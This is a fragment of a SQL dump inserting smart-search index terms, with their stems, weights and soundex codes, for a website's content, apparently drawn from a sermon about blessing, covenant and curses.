(269417, 'action it\'s', 'action it', 0, 1, 1.3667, 'A23532', 1, '*'),
(269418, 'action it\'s something', 'action it something', 0, 1, 1.7, 'A235325352', 1, '*'),
(269419, 'affect men', 'affect men', 0, 1, 1.3333, 'A1235', 1, '*'),
(269420, 'affect men have', 'affect men have', 0, 1, 1.5, 'A12351', 1, '*'),
(269421, 'affects people\'s', 'affect people', 0, 1, 1.5333, 'A1232142', 1, '*'),
(269422, 'affects people\'s response', 'affect people response', 0, 1, 1.8333, 'A123214262152', 1, '*'),
(269423, 'afraid the', 'afraid the', 0, 1, 1.3333, 'A163', 1, '*'),
(269424, 'afraid the only', 'afraid the only', 0, 1, 1.5, 'A16354', 1, '*'),
(269425, 'against israel but', 'against israel but', 0, 1, 1.6, 'A252326413', 1, '*'),
(269426, 'against you neither', 'against you neither', 0, 1, 1.6333, 'A2523536', 1, '*'),
(269427, 'against you.”', 'against you.”', 0, 1, 1.4333, 'A2523', 1, '*'),
(269428, 'against you.” you', 'against you.” you', 0, 1, 1.5667, 'A2523', 1, '*'),
(269429, 'agent', 'agent', 0, 0, 0.3333, 'A253', 1, '*'),
(269430, 'agent that', 'agent that', 0, 1, 1.3333, 'A253', 1, '*'),
(269431, 'agent that can', 'agent that can', 0, 1, 1.4667, 'A25325', 1, '*'),
(269432, 'allow anybody', 'allow anybody', 0, 1, 1.4333, 'A4513', 1, '*'),
(269433, 'allow anybody to', 'allow anybody to', 0, 1, 1.5333, 'A4513', 1, '*'),
(269434, 'almighty and', 'almighti and', 0, 1, 1.4, 'A452353', 1, '*'),
(269435, 'almighty and god', 'almighti and god', 0, 1, 1.5333, 'A45235323', 1, '*'),
(269436, 'almighty sealed', 'almighti sealed', 0, 1, 1.5, 'A4523243', 1, '*'),
(269437, 'almighty sealed in', 'almighti sealed in', 0, 1, 1.6, 'A45232435', 1, '*'),
(269438, 'along as', 'along as', 0, 1, 1.2667, 'A452', 1, '*'),
(269439, 'along as you', 'along as you', 0, 1, 1.4, 'A452', 1, '*'),
(269440, 'an ordinary', 'an ordinary', 0, 1, 1.3667, 'A56356', 2, '*'),
(269441, 'an ordinary human', 'an ordinary human', 0, 1, 1.5667, 'A563565', 1, '*'),
(269442, 'and causes', 'and causes', 0, 1, 1.3333, 'A532', 1, '*'),
(269443, 'and causes it', 'and causes it', 0, 1, 1.4333, 'A5323', 1, '*'),
(269444, 'and changes', 'and changes', 0, 1, 1.3667, 'A53252', 1, '*'),
(269445, 'and changes your', 'and changes your', 0, 1, 1.5333, 'A532526', 1, '*'),
(269446, 'and god almighty', 'and god almighty', 0, 1, 1.5333, 'A53234523', 1, '*'),
(269447, 'and stay under', 'and stay under', 0, 1, 1.4667, 'A5323536', 1, '*'),
(269448, 'and upward', 'and upward', 0, 1, 1.3333, 'A53163', 1, '*'),
(269449, 'and upward till', 'and upward till', 0, 1, 1.5, 'A531634', 1, '*'),
(269450, 'and win withjesus', 'and win withjesus', 0, 1, 1.5667, 'A53532', 1, '*'),
(269451, 'and you have', 'and you have', 0, 1, 1.4, 'A531', 3, '*'),
(269452, 'any divination', 'ani divination', 0, 1, 1.4667, 'A531535', 1, '*'),
(269453, 'any divination against', 'ani divination against', 0, 1, 1.7333, 'A5315352523', 1, '*'),
(269454, 'anybody', 'anybodi', 0, 0, 0.4667, 'A513', 1, '*'),
(269455, 'anybody to', 'anybodi to', 0, 1, 1.3333, 'A513', 1, '*'),
(269456, 'anybody to curse', 'anybodi to curse', 0, 1, 1.5333, 'A513262', 1, '*'),
(269457, 'are a carrier', 'ar a carrier', 0, 1, 1.4333, 'A626', 1, '*'),
(269458, 'are a covenant', 'ar a covenant', 0, 1, 1.4667, 'A62153', 1, '*'),
(269459, 'are blessed beyond', 'ar blessed beyond', 0, 1, 1.6, 'A61423153', 1, '*'),
(269460, 'are blessed you', 'ar blessed you', 0, 1, 1.5, 'A61423', 1, '*'),
(269461, 'are going forward', 'ar going forward', 0, 1, 1.5667, 'A6252163', 1, '*'),
(269462, 'are going into', 'ar going into', 0, 1, 1.4667, 'A625253', 1, '*'),
(269463, 'are not an', 'ar not an', 0, 1, 1.3333, 'A6535', 1, '*'),
(269464, 'are only two', 'ar only two', 0, 1, 1.4, 'A6543', 1, '*'),
(269465, 'around you and', 'around you and', 0, 1, 1.4667, 'A65353', 1, '*'),
(269466, 'as you are', 'as you are', 0, 1, 1.3333, 'A260', 1, '*'),
(269467, 'as you step', 'as you step', 0, 1, 1.3667, 'A231', 1, '*'),
(269468, 'as you work', 'as you work', 0, 1, 1.3667, 'A262', 1, '*'),
(269469, 'at the best', 'at the best', 0, 1, 1.3667, 'A3123', 1, '*'),
(269470, 'atmosphere the', 'atmospher the', 0, 1, 1.4667, 'A352163', 1, '*'),
(269471, 'atmosphere the blessing', 'atmospher the blessing', 0, 1, 1.7667, 'A35216314252', 1, '*'),
(269472, 'balaam tried', 'balaam tried', 0, 1, 1.4, 'B45363', 1, '*'),
(269473, 'balaam tried it', 'balaam tried it', 0, 1, 1.5, 'B45363', 1, '*'),
(269474, 'banker a', 'banker a', 0, 1, 1.2667, 'B526', 1, '*'),
(269475, 'banker a business', 'banker a business', 0, 1, 1.5667, 'B5261252', 1, '*'),
(269476, 'be afraid', 'be afraid', 0, 1, 1.3, 'B630', 1, '*'),
(269477, 'be afraid the', 'be afraid the', 0, 1, 1.4333, 'B630', 1, '*'),
(269478, 'be blessed simply', 'be blessed simply', 0, 1, 1.5667, 'B4232514', 1, '*'),
(269479, 'be cursed', 'be cursed', 0, 1, 1.3, 'B2623', 1, '*'),
(269480, 'be cursed so', 'be cursed so', 0, 1, 1.4, 'B26232', 1, '*'),
(269481, 'be favourable', 'be favourable', 0, 1, 1.4333, 'B614', 1, '*'),
(269482, 'be favourable towards', 'be favourable towards', 0, 1, 1.7, 'B6143632', 1, '*'),
(269483, 'be released', 'be released', 0, 1, 1.3667, 'B6423', 1, '*'),
(269484, 'be released in', 'be released in', 0, 1, 1.4667, 'B64235', 1, '*'),
(269485, 'because they were', 'becaus they were', 0, 1, 1.5667, 'B236', 1, '*'),
(269486, 'beloved take note', 'belov take note', 0, 1, 1.5667, 'B413253', 1, '*'),
(269487, 'best of', 'best of', 0, 1, 1.2333, 'B231', 1, '*'),
(269488, 'best of his', 'best of his', 0, 1, 1.3667, 'B2312', 1, '*'),
(269489, 'between you', 'between you', 0, 1, 1.3667, 'B350', 1, '*'),
(269490, 'between you and', 'between you and', 0, 1, 1.5, 'B353', 1, '*'),
(269491, 'beyond the curse', 'beyond the curse', 0, 1, 1.5333, 'B53262', 1, '*'),
(269492, 'beyond the problem', 'beyond the problem', 0, 1, 1.6, 'B5316145', 1, '*'),
(269493, 'beyond the recession', 'beyond the recession', 0, 1, 1.6667, 'B53625', 1, '*'),
(269494, 'blessed beyond', 'bless beyond', 0, 1, 1.4667, 'B423153', 1, '*'),
(269495, 'blessed beyond the', 'bless beyond the', 0, 1, 1.6, 'B423153', 1, '*'),
(269496, 'blessed of the', 'bless of the', 0, 1, 1.4667, 'B42313', 1, '*'),
(269497, 'blessed simply', 'bless simply', 0, 1, 1.4667, 'B4232514', 1, '*'),
(269498, 'blessed simply means', 'bless simply means', 0, 1, 1.6667, 'B423251452', 1, '*'),
(269499, 'blessed you', 'bless you', 0, 1, 1.3667, 'B423', 1, '*'),
(269500, 'blessed you cannot', 'bless you cannot', 0, 1, 1.6, 'B423253', 1, '*'),
(269501, 'blessing affects', 'bless affects', 0, 1, 1.5333, 'B42521232', 1, '*'),
(269502, 'blessing affects people\'s', 'bless affects people', 0, 1, 1.8333, 'B42521232142', 1, '*'),
(269503, 'blessing and', 'bless and', 0, 1, 1.4, 'B425253', 1, '*'),
(269504, 'blessing and stay', 'bless and stay', 0, 1, 1.5667, 'B42525323', 1, '*'),
(269505, 'blessing and you', 'bless and you', 0, 1, 1.5333, 'B425253', 1, '*'),
(269506, 'blessing is', 'bless is', 0, 1, 1.3667, 'B4252', 1, '*'),
(269507, 'blessing is a', 'bless is a', 0, 1, 1.4333, 'B4252', 1, '*'),
(269508, 'blessing we', 'bless we', 0, 1, 1.3667, 'B4252', 1, '*'),
(269509, 'blessing we are', 'bless we are', 0, 1, 1.5, 'B42526', 1, '*'),
(269510, 'blessing you', 'bless you', 0, 1, 1.4, 'B4252', 1, '*'),
(269511, 'blessing you must', 'bless you must', 0, 1, 1.5667, 'B4252523', 1, '*'),
(269512, 'business man load', 'busi man load', 0, 1, 1.5667, 'B252543', 1, '*'),
(269513, 'but he failed', 'but he failed', 0, 1, 1.4333, 'B3143', 1, '*'),
(269514, 'but whether', 'but whether', 0, 1, 1.3667, 'B360', 1, '*'),
(269515, 'but whether it\'s', 'but whether it', 0, 1, 1.5333, 'B3632', 1, '*'),
(269516, 'by your action', 'by your action', 0, 1, 1.4667, 'B6235', 1, '*'),
(269517, 'calls us', 'call us', 0, 1, 1.2667, 'C420', 1, '*'),
(269518, 'calls us to', 'call us to', 0, 1, 1.3667, 'C423', 1, '*'),
(269519, 'can be released', 'can be released', 0, 1, 1.5, 'C516423', 1, '*'),
(269520, 'can curse', 'can curse', 0, 1, 1.3, 'C5262', 1, '*'),
(269521, 'can curse you', 'can curse you', 0, 1, 1.4333, 'C5262', 1, '*'),
(269522, 'can speak', 'can speak', 0, 1, 1.3, 'C5212', 1, '*'),
(269523, 'can speak words', 'can speak words', 0, 1, 1.5, 'C5212632', 1, '*'),
(269524, 'candidate', 'candid', 0, 0, 0.6, 'C530', 1, '*'),
(269525, 'candidate to', 'candid to', 0, 1, 1.4, 'C530', 1, '*'),
(269526, 'candidate to fight', 'candid to fight', 0, 1, 1.6, 'C53123', 1, '*'),
(269527, 'cannot be cursed', 'cannot be cursed', 0, 1, 1.5333, 'C5312623', 1, '*'),
(269528, 'cannot stay', 'cannot stay', 0, 1, 1.3667, 'C5323', 1, '*'),
(269529, 'cannot stay balaam', 'cannot stay balaam', 0, 1, 1.6, 'C5323145', 1, '*'),
(269530, 'carrier', 'carrier', 0, 0, 0.4667, 'C600', 1, '*'),
(269531, 'carrier of', 'carrier of', 0, 1, 1.3333, 'C610', 1, '*'),
(269532, 'carrier of the', 'carrier of the', 0, 1, 1.4667, 'C613', 1, '*'),
(269533, 'causes it', 'caus it', 0, 1, 1.3, 'C300', 1, '*'),
(269534, 'causes it to', 'caus it to', 0, 1, 1.4, 'C300', 1, '*'),
(269535, 'changes your', 'chang your', 0, 1, 1.4, 'C526', 1, '*'),
(269536, 'changes your atmosphere', 'chang your atmosphere', 0, 1, 1.7667, 'C52635216', 1, '*'),
(269537, 'come under', 'come under', 0, 1, 1.3333, 'C536', 1, '*'),
(269538, 'come under the', 'come under the', 0, 1, 1.4667, 'C5363', 1, '*'),
(269539, 'covenant between', 'coven between', 0, 1, 1.5333, 'C153135', 1, '*'),
(269540, 'covenant between you', 'coven between you', 0, 1, 1.6667, 'C153135', 1, '*'),
(269541, 'covenant child', 'coven child', 0, 1, 1.4667, 'C153243', 1, '*'),
(269542, 'covenant child of', 'coven child of', 0, 1, 1.5667, 'C1532431', 1, '*'),
(269543, 'covenant keeping', 'coven keeping', 0, 1, 1.5333, 'C1532152', 1, '*'),
(269544, 'covenant keeping god', 'coven keeping god', 0, 1, 1.6667, 'C15321523', 1, '*'),
(269545, 'covenant mindset', 'coven mindset', 0, 1, 1.5333, 'C1535323', 1, '*'),
(269546, 'covenant mindset god', 'coven mindset god', 0, 1, 1.6667, 'C153532323', 1, '*'),
(269547, 'covenant understand', 'coven understand', 0, 1, 1.6333, 'C1535362353', 1, '*'),
(269548, 'covenant understand you', 'coven understand you', 0, 1, 1.7667, 'C1535362353', 1, '*'),
(269549, 'covenant with', 'coven with', 0, 1, 1.4333, 'C153', 1, '*'),
(269550, 'covenant with god', 'coven with god', 0, 1, 1.5667, 'C15323', 1, '*'),
(269551, 'curse we', 'curs we', 0, 1, 1.2667, 'C620', 1, '*'),
(269552, 'curse we are', 'curs we are', 0, 1, 1.4, 'C626', 1, '*'),
(269553, 'curse you', 'curs you', 0, 1, 1.3, 'C620', 1, '*'),
(269554, 'curse you and', 'curs you and', 0, 1, 1.4333, 'C6253', 1, '*'),
(269555, 'curse you every', 'curs you every', 0, 1, 1.5, 'C6216', 1, '*'),
(269556, 'cursed even', 'curs even', 0, 1, 1.3667, 'C62315', 1, '*'),
(269557, 'cursed even at', 'curs even at', 0, 1, 1.4667, 'C623153', 1, '*'),
(269558, 'cursed so', 'curs so', 0, 1, 1.3, 'C6232', 1, '*'),
(269559, 'cursed so don\'t', 'curs so don', 0, 1, 1.5, 'C6232353', 1, '*'),
(269560, 'david is', 'david is', 0, 1, 1.2667, 'D132', 1, '*'),
(269561, 'david is what', 'david is what', 0, 1, 1.4333, 'D1323', 1, '*'),
(269562, 'divination', 'divin', 0, 0, 0.6667, 'D1535', 1, '*'),
(269563, 'divination against', 'divin against', 0, 1, 1.6, 'D15352523', 1, '*'),
(269564, 'divination against you.”', 'divin against you.”', 0, 1, 1.8, 'D15352523', 1, '*'),
(269565, 'doctor', 'doctor', 0, 0, 0.4, 'D236', 2, '*'),
(269566, 'doctor a', 'doctor a', 0, 1, 1.2667, 'D236', 1, '*'),
(269567, 'doctor a banker', 'doctor a banker', 0, 1, 1.5, 'D2361526', 1, '*'),
(269568, 'don\'t be afraid', 'don be afraid', 0, 1, 1.5, 'D53163', 1, '*'),
(269569, 'effort his', 'effort his', 0, 1, 1.3333, 'E1632', 1, '*'),
(269570, 'effort his outcome', 'effort his outcome', 0, 1, 1.6, 'E1632325', 1, '*'),
(269571, 'effort in', 'effort in', 0, 1, 1.3, 'E1635', 1, '*'),
(269572, 'effort in life', 'effort in life', 0, 1, 1.4667, 'E163541', 1, '*'),
(269573, 'enchantment', 'enchant', 0, 0, 0.7333, 'E525353', 1, '*'),
(269574, 'enchantment against', 'enchant against', 0, 1, 1.6333, 'E5253532523', 1, '*'),
(269575, 'enchantment against you', 'enchant against you', 0, 1, 1.7667, 'E5253532523', 1, '*'),
(269576, 'enemy picks', 'enemi picks', 0, 1, 1.3667, 'E512', 1, '*'),
(269577, 'enemy picks on', 'enemi picks on', 0, 1, 1.4667, 'E5125', 1, '*'),
(269578, 'enjoy this', 'enjoi this', 0, 1, 1.3333, 'E5232', 1, '*'),
(269579, 'enjoy this year', 'enjoi this year', 0, 1, 1.5, 'E52326', 1, '*'),
(269580, 'even at', 'even at', 0, 1, 1.2333, 'E153', 1, '*'),
(269581, 'even at the', 'even at the', 0, 1, 1.3667, 'E153', 1, '*'),
(269582, 'every other agent', 'everi other agent', 0, 1, 1.5667, 'E1636253', 1, '*'),
(269583, 'failed because they', 'fail because they', 0, 1, 1.6333, 'F43123', 1, '*'),
(269584, 'father\'s heart 15', 'father heart 15', 0, 1, 1.5667, 'F36263', 1, '*'),
(269585, 'favourable', 'favour', 0, 0, 0.6667, 'F614', 1, '*'),
(269586, 'favourable towards', 'favour towards', 0, 1, 1.6, 'F6143632', 1, '*'),
(269587, 'favourable towards your', 'favour towards your', 0, 1, 1.7667, 'F61436326', 1, '*'),
(269588, 'fight for', 'fight for', 0, 1, 1.3, 'F2316', 1, '*'),
(269589, 'fight for it\'s', 'fight for it', 0, 1, 1.4667, 'F231632', 1, '*'),
(269590, 'following things that', 'follow things that', 0, 1, 1.7, 'F4523523', 1, '*'),
(269591, 'for it\'s', 'for it', 0, 1, 1.2667, 'F632', 1, '*'),
(269592, 'for it\'s written', 'for it written', 0, 1, 1.5333, 'F632635', 1, '*'),
(269593, 'force sometimes', 'forc sometimes', 0, 1, 1.5, 'F625352', 1, '*'),
(269594, 'force sometimes it', 'forc sometimes it', 0, 1, 1.6, 'F6253523', 1, '*'),
(269595, 'forth effort', 'forth effort', 0, 1, 1.4, 'F63163', 1, '*'),
(269596, 'forth effort in', 'forth effort in', 0, 1, 1.5, 'F631635', 1, '*'),
(269597, 'forward and', 'forward and', 0, 1, 1.3667, 'F6353', 1, '*'),
(269598, 'forward and upward', 'forward and upward', 0, 1, 1.6, 'F6353163', 1, '*'),
(269599, 'from today', 'from today', 0, 1, 1.3333, 'F653', 2, '*'),
(269600, 'from today there', 'from today there', 0, 1, 1.5333, 'F6536', 1, '*'),
(269601, 'gave to', 'gave to', 0, 1, 1.2333, 'G130', 1, '*'),
(269602, 'gave to david', 'gave to david', 0, 1, 1.4333, 'G1313', 1, '*'),
(269603, 'god 3 sure', 'god 3 sure', 0, 1, 1.3333, 'G326', 1, '*'),
(269604, 'god almighty', 'god almighty', 0, 1, 1.4, 'G34523', 1, '*'),
(269605, 'god almighty and', 'god almighty and', 0, 1, 1.5333, 'G3452353', 1, '*'),
(269606, 'god almighty sealed', 'god almighty sealed', 0, 1, 1.6333, 'G34523243', 1, '*'),
(269607, 'god as you', 'god as you', 0, 1, 1.3333, 'G320', 1, '*'),
(269608, 'god he remembers', 'god he remembers', 0, 1, 1.5333, 'G365162', 1, '*'),
(269609, 'god is a', 'god is a', 0, 1, 1.2667, 'G320', 2, '*'),
(269610, 'god that he', 'god that he', 0, 1, 1.3667, 'G300', 1, '*'),
(269611, 'god there is', 'god there is', 0, 1, 1.4, 'G362', 1, '*'),
(269612, 'god therefore it', 'god therefore it', 0, 1, 1.5333, 'G36163', 1, '*'),
(269613, 'going forward', 'go forward', 0, 1, 1.4333, 'G52163', 1, '*'),
(269614, 'going forward and', 'go forward and', 0, 1, 1.5667, 'G5216353', 1, '*'),
(269615, 'going from', 'go from', 0, 1, 1.3333, 'G52165', 1, '*'),
(269616, 'going from today', 'go from today', 0, 1, 1.5333, 'G521653', 1, '*'),
(269617, 'going into', 'go into', 0, 1, 1.3333, 'G5253', 2, '*'),
(269618, 'going into the', 'go into the', 0, 1, 1.4667, 'G5253', 1, '*'),
(269619, 'has picked', 'ha picked', 0, 1, 1.3333, 'H2123', 1, '*'),
(269620, 'has picked the', 'ha picked the', 0, 1, 1.4667, 'H2123', 1, '*'),
(269621, 'have a covenant', 'have a covenant', 0, 1, 1.5, 'H12153', 1, '*'),
(269622, 'have a positive', 'have a positive', 0, 1, 1.5, 'H1231', 1, '*'),
(269623, 'have to settle', 'have to settle', 0, 1, 1.4667, 'H13234', 1, '*'),
(269624, 'he calls us', 'he calls us', 0, 1, 1.3667, 'H242', 1, '*'),
(269625, 'he failed because', 'he failed because', 0, 1, 1.5667, 'H14312', 1, '*'),
(269626, 'he gave', 'he gave', 0, 1, 1.2333, 'H210', 1, '*'),
(269627, 'he gave to', 'he gave to', 0, 1, 1.3333, 'H213', 1, '*'),
(269628, 'he has picked', 'he has picked', 0, 1, 1.4333, 'H2123', 1, '*'),
(269629, 'he remembers', 'he remembers', 0, 1, 1.4, 'H65162', 1, '*'),
(269630, 'he remembers covenant', 'he remembers covenant', 0, 1, 1.7, 'H65162153', 1, '*'),
(269631, 'heart 15', 'heart 15', 0, 1, 1.2667, 'H630', 1, '*'),
(269632, 'heart 15 01', 'heart 15 01', 0, 1, 1.3667, 'H630', 1, '*'),
(269633, 'his effort', 'hi effort', 0, 1, 1.3333, 'H2163', 1, '*'),
(269634, 'his effort his', 'hi effort his', 0, 1, 1.4667, 'H21632', 1, '*'),
(269635, 'his outcome', 'hi outcome', 0, 1, 1.3667, 'H2325', 1, '*'),
(269636, 'his outcome is', 'hi outcome is', 0, 1, 1.4667, 'H23252', 1, '*'),
(269637, 'if the enemy', 'if the enemy', 0, 1, 1.4, 'I135', 1, '*'),
(269638, 'in life it\'s', 'in life it', 0, 1, 1.4, 'I54132', 1, '*'),
(269639, 'in the blood', 'in the blood', 0, 1, 1.4, 'I53143', 1, '*'),
(269640, 'in words', 'in words', 0, 1, 1.2667, 'I5632', 1, '*'),
(269641, 'in words but', 'in words but', 0, 1, 1.4, 'I563213', 1, '*'),
(269642, 'in words or', 'in words or', 0, 1, 1.3667, 'I56326', 1, '*'),
(269643, 'influence the', 'influenc the', 0, 1, 1.4333, 'I514523', 3, '*'),
(269644, 'influence the blessing', 'influenc the blessing', 0, 1, 1.7333, 'I51452314252', 1, '*'),
(269645, 'into 2017 1', 'into 2017 1', 0, 1, 1.3667, 'I530', 1, '*'),
(269646, 'into 2017 going', 'into 2017 going', 0, 1, 1.5, 'I53252', 1, '*'),
(269647, 'into the year', 'into the year', 0, 1, 1.4333, 'I536', 1, '*'),
(269648, 'is a covenant', 'is a covenant', 0, 1, 1.4333, 'I2153', 1, '*'),
(269649, 'is a doctor', 'is a doctor', 0, 1, 1.3667, 'I23236', 1, '*'),
(269650, 'is a supernatural', 'is a supernatural', 0, 1, 1.5667, 'I2165364', 1, '*'),
(269651, 'is cursed', 'is cursed', 0, 1, 1.3, 'I2623', 1, '*'),
(269652, 'is cursed even', 'is cursed even', 0, 1, 1.4667, 'I262315', 1, '*'),
(269653, 'is god almighty', 'is god almighty', 0, 1, 1.5, 'I234523', 1, '*'),
(269654, 'is lesser', 'is lesser', 0, 1, 1.3, 'I2426', 1, '*'),
(269655, 'is lesser than', 'is lesser than', 0, 1, 1.4667, 'I242635', 1, '*'),
(269656, 'is no enchantment', 'is no enchantment', 0, 1, 1.5667, 'I2525353', 1, '*'),
(269657, 'is required when', 'is required when', 0, 1, 1.5333, 'I262635', 1, '*'),
(269658, 'is something on', 'is something on', 0, 1, 1.5, 'I253525', 1, '*'),
(269659, 'is there any', 'is there any', 0, 1, 1.4, 'I2365', 1, '*'),
(269660, 'is what he', 'is what he', 0, 1, 1.3333, 'I230', 1, '*'),
(269661, 'israel but', 'israel but', 0, 1, 1.3333, 'I26413', 1, '*'),
(269662, 'israel but he', 'israel but he', 0, 1, 1.4333, 'I26413', 1, '*'),
(269663, 'it against', 'it against', 0, 1, 1.3333, 'I32523', 1, '*'),
(269664, 'it against israel', 'it against israel', 0, 1, 1.5667, 'I32523264', 1, '*'),
(269665, 'it cannot', 'it cannot', 0, 1, 1.3, 'I3253', 1, '*'),
(269666, 'it cannot stay', 'it cannot stay', 0, 1, 1.4667, 'I325323', 1, '*'),
(269667, 'it to be', 'it to be', 0, 1, 1.2667, 'I310', 1, '*'),
(269668, 'it will stay', 'it will stay', 0, 1, 1.4, 'I3423', 1, '*'),
(269669, 'it\'s a', 'it a', 0, 1, 1.2, 'I320', 2, '*'),
(269670, 'it\'s a supernatural', 'it a supernatural', 0, 1, 1.6333, 'I32165364', 1, '*'),
(269671, 'it\'s released', 'it released', 0, 1, 1.4333, 'I326423', 1, '*'),
(269672, 'it\'s released in', 'it released in', 0, 1, 1.5333, 'I3264235', 1, '*'),
(269673, 'it\'s something', 'it something', 0, 1, 1.4667, 'I325352', 1, '*'),
(269674, 'it\'s something that', 'it something that', 0, 1, 1.6333, 'I3253523', 1, '*'),
(269675, 'it\'s written', 'it written', 0, 1, 1.4, 'I32635', 1, '*'),
(269676, 'it\'s written over', 'it written over', 0, 1, 1.5667, 'I3263516', 1, '*'),
(269677, 'item 16', 'item 16', 0, 1, 1.2333, 'I350', 1, '*'),
(269678, 'item 16 father', 'item 16 father', 0, 1, 1.4667, 'I35136', 1, '*'),
(269679, 'itself', 'itself', 0, 0, 0.4, 'I3241', 1, '*'),
(269680, 'itself around', 'itself around', 0, 1, 1.4333, 'I3241653', 1, '*'),
(269681, 'itself around you', 'itself around you', 0, 1, 1.5667, 'I3241653', 1, '*'),
(269682, 'jesus as you', 'jesu as you', 0, 1, 1.4, 'J000', 1, '*'),
(269683, 'k2 item 16', 'k2 item 16', 0, 1, 1.3333, 'K350', 1, '*'),
(269684, 'keeping', 'keep', 0, 0, 0.4667, 'K152', 1, '*'),
(269685, 'keeping god', 'keep god', 0, 1, 1.3667, 'K1523', 1, '*'),
(269686, 'keeping god he', 'keep god he', 0, 1, 1.4667, 'K1523', 1, '*'),
(269687, 'lesser than god', 'lesser than god', 0, 1, 1.5, 'L263523', 1, '*'),
(269688, 'life as you', 'life as you', 0, 1, 1.3667, 'L120', 1, '*'),
(269689, 'life it\'s', 'life it', 0, 1, 1.3, 'L132', 1, '*'),
(269690, 'life it\'s a', 'life it a', 0, 1, 1.3667, 'L132', 1, '*'),
(269691, 'life that makes', 'life that makes', 0, 1, 1.5, 'L1352', 1, '*'),
(269692, 'life “surely', 'life “surely', 0, 1, 1.4, 'L1264', 1, '*'),
(269693, 'life “surely there', 'life “surely there', 0, 1, 1.6, 'L126436', 1, '*'),
(269694, 'load', 'load', 0, 0, 0.2667, 'L300', 1, '*'),
(269695, 'load yourself', 'load yourself', 0, 1, 1.4333, 'L36241', 1, '*'),
(269696, 'load yourself with', 'load yourself with', 0, 1, 1.6, 'L362413', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(269697, 'lord if the', 'lord if the', 0, 1, 1.3667, 'L6313', 1, '*'),
(269698, 'makes you to', 'make you to', 0, 1, 1.4, 'M230', 2, '*'),
(269699, 'man is cursed', 'man is cursed', 0, 1, 1.4333, 'M2623', 1, '*'),
(269700, 'man load', 'man load', 0, 1, 1.2667, 'M430', 1, '*'),
(269701, 'man load yourself', 'man load yourself', 0, 1, 1.5667, 'M436241', 1, '*'),
(269702, 'means there', 'mean there', 0, 1, 1.3667, 'M236', 1, '*'),
(269703, 'means there is', 'mean there is', 0, 1, 1.4667, 'M2362', 1, '*'),
(269704, 'men have taken', 'men have taken', 0, 1, 1.4667, 'M1325', 1, '*'),
(269705, 'mercies of', 'merci of', 0, 1, 1.3333, 'M621', 1, '*'),
(269706, 'mercies of god', 'merci of god', 0, 1, 1.4667, 'M62123', 1, '*'),
(269707, 'mindset god', 'mindset god', 0, 1, 1.3667, 'M32323', 1, '*'),
(269708, 'mindset god is', 'mindset god is', 0, 1, 1.4667, 'M323232', 1, '*'),
(269709, 'must come', 'must come', 0, 1, 1.3, 'M2325', 2, '*'),
(269710, 'must come under', 'must come under', 0, 1, 1.5, 'M232536', 1, '*'),
(269711, 'must take along', 'must take along', 0, 1, 1.5, 'M232452', 1, '*'),
(269712, 'neither is', 'neither is', 0, 1, 1.3333, 'N362', 1, '*'),
(269713, 'neither is there', 'neither is there', 0, 1, 1.5333, 'N36236', 1, '*'),
(269714, 'no enchantment', 'no enchantment', 0, 1, 1.4667, 'N25353', 1, '*'),
(269715, 'no enchantment against', 'no enchantment against', 0, 1, 1.7333, 'N253532523', 1, '*'),
(269716, 'not allow anybody', 'not allow anybody', 0, 1, 1.5667, 'N34513', 1, '*'),
(269717, 'not an ordinary', 'not an ordinary', 0, 1, 1.5, 'N356356', 1, '*'),
(269718, 'note of the', 'note of the', 0, 1, 1.3667, 'N313', 1, '*'),
(269719, 'of his effort', 'of his effort', 0, 1, 1.4333, 'O12163', 1, '*'),
(269720, 'of jesus as', 'of jesus as', 0, 1, 1.3667, 'O120', 1, '*'),
(269721, 'of the blessing', 'of the blessing', 0, 1, 1.5, 'O1314252', 1, '*'),
(269722, 'of the following', 'of the following', 0, 1, 1.5333, 'O131452', 1, '*'),
(269723, 'on this planet', 'on this planet', 0, 1, 1.4667, 'O5321453', 1, '*'),
(269724, 'on you he', 'on you he', 0, 1, 1.3, 'O500', 1, '*'),
(269725, 'only two ways', 'onli two ways', 0, 1, 1.4333, 'O5432', 1, '*'),
(269726, 'or provoked', 'or provoked', 0, 1, 1.3667, 'O616123', 1, '*'),
(269727, 'or provoked by', 'or provoked by', 0, 1, 1.4667, 'O6161231', 1, '*'),
(269728, 'ordinary', 'ordinari', 0, 0, 0.5333, 'O6356', 2, '*'),
(269729, 'ordinary human', 'ordinari human', 0, 1, 1.4667, 'O63565', 1, '*'),
(269730, 'ordinary human being', 'ordinari human being', 0, 1, 1.6667, 'O63565152', 1, '*'),
(269731, 'other agent', 'other agent', 0, 1, 1.3667, 'O36253', 1, '*'),
(269732, 'other agent that', 'other agent that', 0, 1, 1.5333, 'O36253', 1, '*'),
(269733, 'outcome is', 'outcom is', 0, 1, 1.3333, 'O3252', 1, '*'),
(269734, 'outcome is lesser', 'outcom is lesser', 0, 1, 1.5667, 'O3252426', 1, '*'),
(269735, 'outcome when', 'outcom when', 0, 1, 1.4, 'O325', 1, '*'),
(269736, 'outcome when a', 'outcom when a', 0, 1, 1.4667, 'O325', 1, '*'),
(269737, 'outcome when you', 'outcom when you', 0, 1, 1.5333, 'O325', 1, '*'),
(269738, 'people blessed', 'peopl blessed', 0, 1, 1.4667, 'P41423', 1, '*'),
(269739, 'people blessed of', 'peopl blessed of', 0, 1, 1.5667, 'P414231', 1, '*'),
(269740, 'people\'s response', 'peopl response', 0, 1, 1.5667, 'P4262152', 1, '*'),
(269741, 'people\'s response towards', 'peopl response towards', 0, 1, 1.8333, 'P42621523632', 1, '*'),
(269742, 'person that can', 'person that can', 0, 1, 1.5, 'P625325', 1, '*'),
(269743, 'picks on', 'pick on', 0, 1, 1.2667, 'P250', 1, '*'),
(269744, 'picks on you', 'pick on you', 0, 1, 1.4, 'P250', 1, '*'),
(269745, 'planet', 'planet', 0, 0, 0.4, 'P453', 1, '*'),
(269746, 'planet you', 'planet you', 0, 1, 1.3333, 'P453', 1, '*'),
(269747, 'planet you have', 'planet you have', 0, 1, 1.5, 'P4531', 1, '*'),
(269748, 'positive outcome', 'posit outcome', 0, 1, 1.5333, 'P231325', 1, '*'),
(269749, 'positive outcome when', 'posit outcome when', 0, 1, 1.7, 'P231325', 1, '*'),
(269750, 'problem to', 'problem to', 0, 1, 1.3333, 'P61453', 1, '*'),
(269751, 'problem to be', 'problem to be', 0, 1, 1.4333, 'P614531', 1, '*'),
(269752, 'provoked', 'provok', 0, 0, 0.5333, 'P6123', 1, '*'),
(269753, 'provoked by', 'provok by', 0, 1, 1.3667, 'P61231', 1, '*'),
(269754, 'provoked by your', 'provok by your', 0, 1, 1.5333, 'P612316', 1, '*'),
